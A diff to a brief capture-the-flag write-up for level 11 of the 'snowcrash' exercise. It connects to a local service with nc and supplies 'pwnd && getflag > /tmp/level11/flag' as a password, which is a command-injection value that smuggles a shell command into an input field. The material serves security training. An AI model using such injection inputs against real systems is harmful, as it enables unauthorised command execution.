skuppers/snowcrash/level11/Ressources/write-up.md

 `$ nc localhost 5151`

-And type `getflag > /tmp/level11/flag` as password.
+And type `pwnd && getflag > /tmp/level11/flag` as password.

 And read the flag from the `/tmp/level11/flag` file.